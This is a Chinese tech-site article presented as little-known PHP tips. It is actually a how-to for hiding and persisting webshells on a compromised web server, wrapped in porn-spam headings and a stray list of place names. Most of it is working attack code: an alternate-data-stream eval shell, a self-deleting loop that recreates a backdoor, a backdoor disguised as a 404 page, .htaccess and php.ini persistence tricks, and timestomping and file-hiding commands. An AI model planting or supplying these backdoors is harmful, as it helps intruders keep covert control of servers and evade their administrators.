亚洲激情专区-91九色丨porny丨老师-久久久久久久女国产乱让韩-国产精品午夜小视频观看

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

PHP中一些不為人知的使用技巧

發布時間:2020-11-05 15:45:57 來源:億速云 閱讀:183 作者:Leah 欄目:開發技術

PHP中一些不為人知的使用技巧?很多新手對此不是很清楚,為了幫助大家解決這個難題,下面小編將為大家詳細講解,有這方面需求的人可以來學習下,希望你能有所收獲。

1、隱藏文件

使用Attrib +s +a +h +r命令就是把原本的文件夾增加了系統文件屬性、存檔文件屬性、只讀文件屬性和隱藏文件屬性。

attrib +s +a +h +r shell.php //隱藏shell.php文件

2、修改文件時間屬性

當你試圖在一堆文件中隱藏自己新創建的文件,那么,除了創建一個迷惑性的文件名,還需要修改文件的修改日期。

//修改時間修改
Set-ItemProperty -Path 2.txt LastWriteTime -Value "2020-11-01 12:12:12"
//訪問時間修改
Set-ItemProperty -Path 2.txt LastAccessTime -Value "2020-11-01 12:12:12"
//創建時間修改
Set-ItemProperty -Path 2.txt CreationTime -Value "2020-11-01 12:12:12"

使用命令獲取文件屬性

Get-ItemProperty -Path D:\1.dll | Format-list -Property * -Force

修改某個文件夾下所有文件的創建和修改時間

powershell.exe -command "ls 'upload\*.*' | foreach-object { $_.LastWriteTime = Get-Date ; $_.CreationTime = '2018/01/01 19:00:00' }"

3、利用ADS隱藏文件內容

服務器上echo一個數據流文件進去,比如index.php是網頁正常文件,我們可以這樣子搞:

echo ^<&#63;php @eval($_POST['chopper']);&#63;^> > index.php:hidden.jpg

這樣子就生成了一個不可見的shell hidden.jpg,常規的文件管理器、type命令,dir命令、del命令發現都找不出那個hidden.jpg的。

利用include函數,將index.php:hidden.jpg進行hex編碼,把這個ADS文件include進去,這樣子就可以正常解析我們的一句話了。

<&#63;php @include(PACK('H*','696E6465782E7068703A68696464656E2E6A7067'));&#63;>

4、不死馬

不死馬會刪除自身,以進程的形式循環創建隱蔽的后門。

<&#63;php
set_time_limit(0); 
ignore_user_abort(1); 
unlink(__FILE__); //刪除自身
while(1)
{ 
 file_put_contents('shell.php','<&#63;php @eval($_GET[cmd]);&#63;>'); //創建shell.php,這里最好用免殺的一句話
 sleep(10); //間隔時間
}
&#63;>

處理方式最簡單有效的辦法,就是重啟服務就可以刪除webshell文件。

5、中間件后門

將編譯好的so文件復制到modules文件夾,啟動后門模塊,重啟Apache。當發送特定參數的字符串過去時,即可觸發后門。

github項目地址:

https://github.com/VladRico/apache2_BackdoorMod

6、利用404頁面隱藏后門

404頁面主要用來提升用戶體驗,可用來隱藏后門文件。

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h2>Not Found</h2>
<p>The requested URL was not found on this server.</p>
</body></html>
<&#63;php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
header('HTTP/1.1 404 Not Found');
&#63;>

7、利用 .htaccess 文件構成PHP后門

一般.htaccess可以用來留后門和針對黑名單繞過,在上傳目錄創建.htaccess 文件寫入,無需重啟即可生效,上傳png文件解析。

AddType application/x-httpd-php .png

另外,在.htaccess 加入php解析規則,把文件名包含1的解析成php,上傳1.txt即可解析。

<FilesMatch "1"> 
SetHandler application/x-httpd-php 
</FilesMatch>

8、利用 php.ini 隱藏后門文件

php.ini 中可以指定在主文件執行前后自動解析的文件名稱,常用于頁面公共頭部和尾部,也可以用來隱藏php后門。

;在PHP文檔之前自動添加文件。
auto_prepend_file = "c:\tmp.txt"
;在PHP文檔之后自動添加文件。
auto_prepend_file = "c:\tmp.txt"

需重啟服務生效,訪問任意一個php文件即可獲取webshell。

看完上述內容是否對您有幫助呢?如果還想對相關知識有進一步的了解或閱讀更多相關文章,請關注億速云行業資訊頻道,感謝您對億速云的支持。

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

php
AI

宕昌县| 易门县| 永新县| 安国市| 松溪县| 永城市| 长岭县| 灌南县| 扎赉特旗| 鄯善县| 会泽县| 陆丰市| 金湖县| 临洮县| 济南市| 府谷县| 临邑县| 竹北市| 清流县| 通江县| 基隆市| 镇江市| 子长县| 花莲市| 南和县| 交城县| 连山| 屯留县| 寻甸| 鄯善县| 巴南区| 八宿县| 长泰县| 磴口县| 枞阳县| 区。| 抚州市| 襄汾县| 灵山县| 方正县| 和硕县|